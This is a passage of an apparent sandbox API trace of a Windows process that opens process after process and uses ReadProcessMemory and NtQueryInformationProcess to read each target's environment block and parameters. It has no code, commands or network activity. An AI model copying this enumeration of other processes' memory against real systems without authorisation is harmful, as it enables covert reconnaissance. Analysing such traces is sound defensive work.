lpBaseAddress=0x3bd020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.478] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.478] malloc (_Size=0x74) returned 0xd9d190 [0264.478] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e18f4, lpBuffer=0xd9d190, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.479] free (_Block=0xd9d190) [0264.479] CloseHandle (hObject=0x28c) returned 1 [0264.479] _ui64tow_s (in: _Value=0xce8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3304") returned 0x0 [0264.480] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3304") returned 4 [0264.480] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.480] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.481] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xce8) returned 0x28c [0264.481] GetLastError () returned 0x0 [0264.481] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.481] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x24e018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.481] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.482] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x491c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.482] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x491888, lpBuffer=0x138c580, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.482] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.482] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.482] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x24e020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.482] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x491270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.483] malloc (_Size=0x70) returned 0xd9d190 [0264.483] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4918f0, lpBuffer=0xd9d190, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.483] free (_Block=0xd9d190) [0264.484] CloseHandle (hObject=0x28c) returned 1 [0264.486] _ui64tow_s (in: _Value=0xc6c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3180") returned 0x0 [0264.486] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3180") returned 4 [0264.486] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.487] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc6c) returned 0x28c [0264.487] GetLastError () returned 0x0 [0264.488] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.488] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x22c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.488] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.488] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.488] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1888, lpBuffer=0x138c580, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.488] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.489] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.489] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x22c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.489] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.489] malloc (_Size=0x64) returned 0xdafee0 [0264.489] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a18e4, lpBuffer=0xdafee0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafee0*, lpNumberOfBytesRead=0x0) returned 1 [0264.490] free (_Block=0xdafee0) [0264.490] CloseHandle (hObject=0x28c) returned 1 [0264.490] _ui64tow_s (in: _Value=0x664, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1636") returned 0x0 [0264.490] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1636") returned 4 [0264.491] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.491] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x28c [0264.492] GetLastError () returned 0x0 [0264.492] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.492] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x20f018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.492] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.492] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571cb0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.492] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571888, lpBuffer=0x138c580, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.493] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.493] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.493] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x20f020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.493] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.493] malloc (_Size=0x84) returned 0xd9d190 [0264.493] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571904, lpBuffer=0xd9d190, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.494] free (_Block=0xd9d190) [0264.497] CloseHandle (hObject=0x28c) returned 1 [0264.497] _ui64tow_s (in: _Value=0xe50, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3664") returned 0x0 [0264.498] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3664") returned 4 [0264.498] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.498] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.498] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe50) returned 0x28c [0264.499] GetLastError () returned 0x0 [0264.499] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.499] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x232018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.499] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.499] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.499] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1888, lpBuffer=0x138c580, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.499] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.500] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.500] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x232020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.500] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.500] malloc (_Size=0x72) returned 0xd9d190 [0264.500] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e18f2, lpBuffer=0xd9d190, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.500] free (_Block=0xd9d190) [0264.501] CloseHandle (hObject=0x28c) returned 1 [0264.502] _ui64tow_s (in: _Value=0x54c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1356") returned 0x0 [0264.502] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1356") returned 4 [0264.534] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.535] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x28c [0264.536] GetLastError () returned 0x0 [0264.536] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.536] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x223018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.536] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.536] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.536] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1888, lpBuffer=0x138c580, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.537] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.537] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.537] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x223020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.537] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.537] malloc (_Size=0x64) returned 0xdb03b0 [0264.537] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d18e4, lpBuffer=0xdb03b0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.538] free (_Block=0xdb03b0) [0264.543] CloseHandle (hObject=0x28c) returned 1 [0264.544] _ui64tow_s (in: _Value=0x844, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2116") returned 0x0 [0264.545] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2116") returned 4 [0264.545] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.545] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.547] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x28c [0264.548] GetLastError () returned 0x0 [0264.548] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.548] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2ec018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.548] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.549] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x451c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.549] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x451888, lpBuffer=0x138c580, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.553] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.553] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.553] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2ec020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.554] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x451270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.554] malloc (_Size=0x74) returned 0xd9d190 [0264.554] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4518f4, lpBuffer=0xd9d190, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.555] free (_Block=0xd9d190) [0264.555] CloseHandle (hObject=0x28c) returned 1 [0264.555] _ui64tow_s (in: _Value=0xc84, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3204") returned 0x0 [0264.555] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3204") returned 4 [0264.556] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.556] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.557] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc84) returned 0x28c [0264.557] GetLastError () returned 0x0 [0264.557] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.557] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3e6018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.557] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.557] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1c40, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.557] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1888, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.558] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.558] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.558] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3e6020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.558] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.558] malloc (_Size=0x5e) returned 0xdb0490 [0264.558] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a18de, lpBuffer=0xdb0490, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb0490*, lpNumberOfBytesRead=0x0) returned 1 [0264.559] free (_Block=0xdb0490) [0264.559] CloseHandle (hObject=0x28c) returned 1 [0264.560] _ui64tow_s (in: _Value=0x76c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1900") returned 0x0 [0264.560] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1900") returned 4 [0264.560] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.560] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.561] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x28c [0264.561] GetLastError () returned 0x0 [0264.561] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.561] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x257018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.562] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.562] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541c90, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.562] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541888, lpBuffer=0x138c580, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.562] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.563] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.563] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x257020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.563] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.563] malloc (_Size=0x76) returned 0xd9d190 [0264.563] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5418f6, lpBuffer=0xd9d190, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.564] free (_Block=0xd9d190) [0264.564] 